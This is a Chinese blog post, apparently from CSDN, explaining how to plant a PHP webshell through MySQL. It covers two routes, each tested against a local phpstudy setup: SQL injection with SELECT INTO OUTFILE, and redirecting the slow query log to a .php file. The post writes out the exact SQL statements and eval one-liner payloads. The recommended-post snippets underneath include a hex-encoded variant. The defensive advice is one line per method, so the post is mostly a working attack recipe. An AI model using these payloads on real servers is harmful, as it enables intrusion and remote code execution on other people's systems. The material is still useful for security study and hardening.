mysql写shell

最新推荐文章于 2024-04-26 13:29:49 发布
最新推荐文章于 2024-04-26 13:29:49 发布
阅读量1.7k 收藏 3
点赞数
文章标签: mysql 数据库 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47385895/article/details/126471862
版权

mysql写shell

一、Sql注入写shell

原理:select into outfile命令作用将查询结果输出保存到一个文件中
通过sql注入写shell的三个条件:

  1. 知道绝对路径
  2. Secure_file_priv开启
    1.png
    一般Secure_file_priv=null,即不允许导入导出,在mysql中my.ini的[mysqld]中添加一行“Secure_file_priv=”,然后重启mysql,让配置生效。
  3. 目录要有写的权限
    利用sql注入写入sql语句:select 1,2,“<?php @eval[$_POST[dd]; ?]>” into outfile “D:/phpstudy/phpstudy_pro/WWW/1.php”
    Mysql中select into outfile命令作用将查询结果输出保存到一个文件中,以上语句会保存到1.php文件中
    2.png
    随便什么刀连接一下
    3.png
    Getshell成功
    防护建议:利用sql注入漏洞结合数据库的输出文本功能形成getshell,对输入数据的严格审查过滤

二、慢日志查询写shell

1.知道mysql登录密码
2.phpmyadmin开放或者有机会操纵数据库
**原理:**查询超过10秒的语句会被写到慢查询日志文件中去,这样就可以进行文件写入。
查询慢日志查询功能是否开启
4.png
开启慢查询日志功能:set global slow_query_log=1;再次查询
5.png
更改日志文件地址:set global slow_query_log_file=‘D:\phpstudy\phpstudy_pro\WWW\3.php’;查询
6.png
查询内容并超过:select ‘<?php eval($_POST[md]); ?>’ or sleep(11);
7.png
连它
8.png
防护建议:利用mysql正常的功能输出木马文件,弱密码要不得

-键盘侠-
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
mysqlShell小技巧_mysqlshell有几种方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
06-21 398
1.Mysql数据库支持union的时候文件小技巧: 采用常规的union入,可以看到前面的字段占位数肯定也会被入,替换成null也是一样的结果,这个对于shell没啥大碍,mysqlShell小技巧,但是如果用来bat,mof,vbs等文件就会出问题了,那么怎么去掉这个只入我们需要的内容呢?采用hex编码就好了。
sql注入shell条件与方法(统计)
Vdieoo的博客
10-30 7615
条件: 1:要知道网站绝对路径,可以通过报错,phpinfo界面,404界面等一些方式知道 2:gpc没有开启,开启了单引号被转义了,语句就不能正常执行了 3:要有file权限,默认情况下只有root有 4:对目录要有权限,一般image之类的存放突破的目录就有 在mysql的配置文件 my.ini 中,secure_file_priv="c:/wamp64/tmp"被注释 或者`secure_file_priv配置的位置是web目录。 要了解secure_file_priv是否支...
mysql-shell
04-04
用来搭建集群的
sql注入shell
jingxiaoxiong459的博客
08-01 236
id=-1' union select 1,2,0x3c3f706870206576616c2840245f524551554553545b785d293b3f203e into outfile 'D:\\phpstu\\phpstudy_pro\\WWW\\shell.php' --+ 尝试将一句话木马shell.php放入网站根目录。1.先将mysql.ini配置文件添加secure_file_priv = '',让secure_file_priv 不表示任何值。3.准备一句话木马<?
【SQL注入】从注入到获取服务器shell,记一次完整的SQL注入攻击过程
kkza的博客
10-28 1992
注入 以pikachu为例,首先发现一个数据查询的点,对其进行手工验证 易知存在SQL注入 shell 通过mysql入文件需满足 连接数据库是root用户 my.ini配置文件需明确secure_file_priv="目录",参考:MySQL文件 ...
Mysqlshell的几种方式
Redredredfish的博客
08-23 7390
Mysqlshell的几种方式 当我们拿到数据库权限时,可通过数据库管理工具入webshell到目标服务器上,利用webshell控制目标服务器。 复现环境: phpstudy_pro 8.1.0.6 mysql 5.7.26 root权限 网站绝对路径为D:\phpstudy_pro\WWW 利用方式: 通过outfileshell 尝试通过outfile入文件 报错[Code: 1290, SQL State: HY000]The MySQL server is running with
MySQLShell方法总结
做自己喜欢的事,并将其发挥到极致!
12-31 4560
MySQL注入点,用工具对目标站点入一句话shell,需要哪些前提条件? **root权限以及网站的绝对路径** outfile 和 dumpfile Shell 利用条件 ·数据库当前用户为root权限 ·知道当前网站的绝对路径 ·PHP的GPC为OFF状态;(魔术引号,GET、POST、COOKIE) `入的那个路径要有入权限 过滤了单引号into outfile 还可以用吗 不能,GPC要OFF才行,可以测试Hex编码 基于UNION联合查询 ?id=1 UNION ALL SELECT
sql注入shell
weixin_51646864的博客
04-23 6593
靶场练习一下sql注入shell方式
SQL注入入webshell的方法(union select入)
faclon666的博客
03-30 1117
(菜鸟一枚,日常记录,的不对的地方欢迎大家指正)
如何向mysql入wbeshell
ws1813004226的博客
03-23 791
如何向mysql入wbeshell 一、成功入wbeshell必须满足的4个条件: (1)数据库拥有root权限或拥有file权限。 (2)知道网站的绝对路径。 (3)PHP的GPC参数为OFF状态。 (4)MYSQL中的secure_file_priv参数不能为NULL。 二、入方法 1.使用outfile方法。outfile是mysql提供的一个用来入文件的函数,当我们可以控制入文件的内容以及文件的保存路径时,我们就可以上传一个webshell。 2.基于日志入法。将日志文件的导出目录修改成
mysql备份shell脚本
06-10
mysql备份支持全量、日志备份
mysql连接shell
10-12
mysqlshell命令导出数据,执行存储过程
mysql shell安装脚本
03-18
mysql shell安装脚本
shell的多线程&当前文件夹下批量插入MySQL
09-30
shell的多线程,以及使用多线程编shell脚本实现当前文件夹下批量插入MySQL
Mysql_数据库事务
最新发布
weixin_69252724的博客
04-26 573
事务就是由单独单元的一个或多个sql语句组成,在这个单元中,每个sql语句都是相互依赖的。而整个单独单元是作为一个不可分割的整体存在,类似于化学当中的原子(一种不可分割的最小单位)。往通俗的讲就是,事务就是一个整体,里面的内容要么都执行成功,要么都不成功。不可能存在部分执行成功而部分执行不成功的情况。就是说如果单元中某条sql语句一旦执行失败或者产生错误,那么整个单元将会回滚(返回最初状态)。
一文整理完MySQL关系型数据库相关知识
打代码是一天,不打代码也是一天
04-23 1073
在开发中,数据库是专门用来存取数据的软件。数据库的职责就是管理数据的。根据存取数据的类型分为关系型数据库和非关系型数据库数据存储后呈现出来的效果类似上图的,是关系型数据库数据存储后呈现出来的效果类似上图的,是非关系型数据库
MySQL--数据的增删改
pzn2506的博客
04-19 685
文中[ ]里面的内容可可不文中[ ]里。
MySQL 全表扫描成本计算
ZL4120505的博客
04-20 845
private:......IO 成本:从磁盘或内存读取数据页的成本。CPU 成本:访问记录需要消耗的 CPU 成本。导入成本:这一项直到 MySQL 8.0.29 都还没有被使用,先忽略。内存成本:这一项指的是占用内存字节数,计算 MRR(Multi Range Read)方式读取数据的成本时才会用到,也先忽略。全表扫描的成本就只剩 IO 成本、CPU 成本这两项了。全表扫描成本 =io_cost+ 1.1 +cpu_cost+ 1。
深入了解MySQL:从基础到特性,全面解读关系数据库管理系统的历史与应用
lph159的博客
04-23 1027
本文全面介绍了MySQL,这是一种广泛使用的开源关系数据库管理系统(RDBMS),由瑞典MySQL AB公司开发,目前由Oracle公司维护。作为一款具有强大后端功能的数据库软件,MySQL在网站建设、商业智能、数据分析等多个领域中发挥着关键作用。文章从MySQL的历史起源、核心特性,到其在实际应用中的广泛用途进行了详细的阐述。特别指出了MySQL的开源性、高性能、高可扩展性、安全性和灵活性等关键特性,并通过实例展示了如何使用MySQL进行数据库的创建和数据管理。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值